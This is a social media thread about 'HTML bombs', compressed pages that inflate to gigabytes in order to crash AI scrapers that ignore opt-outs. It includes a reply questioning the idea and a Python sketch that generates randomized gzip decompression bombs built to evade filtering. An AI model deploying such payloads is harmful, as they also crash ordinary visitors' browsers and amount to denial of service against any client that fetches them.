Thread

behold the "HTML bomb" it's a defensive counterattack on AI web-scrapers that persistently scrape and rescrape your web site, even when you tell them not to the bomb file *looks* like a tiny HTML page, but when scraped -- or even requested by a regular browser ... ... it unpacks into a huge-ass 10-gig HTML page ... ... which quickly crashes any browser or scraper Item #6 in my latest "Linkfest" newsletter, free to read and subscribe to here: image

Replies (10)

@npub1typ5...c8hh you know what's even better than that? not putting it on the internet! imo if you want to protect your content from AI, just keep it away from the public. my website accepts AI crawlers because, well, it's public, so I have no problem with it. internal resources I don't accept, because that information is private. long story short: if you want to protect your website from AI crawlers, don't upload it to the internet in any way whatsoever. simple as that
@npub1typ5...c8hh This is nearly what I wanted, but it’s statically generated and so will be easy to spot. The thing I really want is a Markov chain that generates totally plausible things directly as compressed data. The gzip compression scheme basically works (oversimplified explanation follows) by having a load of back references to repeated chunks. I want something that generates a few KiB of new random HTML and then a gzip stream that expands to a few GiB of totally plausible-looking text made entirely out of back references to those chunks, so the total download size is maybe 100 KiB but the data the crawler processes is huge. And for these to be random, so they’re hard to filter out.
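A rough approximation of that idea, without hand-assembling DEFLATE blocks: feed one Markov-ish seed through zlib over and over, and the compressor itself encodes every repeat as back references, so the compressed output grows far more slowly than the expanded text. This is a sketch assuming Python's zlib; markov_seed is a stand-in for a real Markov generator, and the function and parameter names are invented for illustration.

```python
import random
import zlib

def markov_seed(nbytes: int = 4096) -> bytes:
    # Stand-in for a real Markov-chain generator: random-ish plausible
    # words, different on every run so the output is hard to fingerprint.
    words = [b"the", b"crawler", b"index", b"model", b"page",
             b"token", b"data", b"cache", b"train", b"fetch"]
    out = bytearray()
    while len(out) < nbytes:
        out += random.choice(words) + b" "
    return bytes(out)

def gzip_bomb(expanded_mib: int = 1024) -> bytes:
    seed = b"<p>" + markov_seed() + b"</p>\n"
    co = zlib.compressobj(level=9, wbits=31)  # wbits=31 -> gzip container
    parts = [co.compress(seed)]               # first copy: literal text
    reps = (expanded_mib << 20) // len(seed)
    for _ in range(reps):
        # The seed stays inside DEFLATE's 32 KiB window, so each further
        # copy is emitted almost entirely as back references to it.
        parts.append(co.compress(seed))
    parts.append(co.flush())
    return b"".join(parts)
```

Letting the compressor do the work won't hit the ratio of a hand-built stream of pure back references, but the download stays small, the inflated text is arbitrarily large, and each request can serve a different seed.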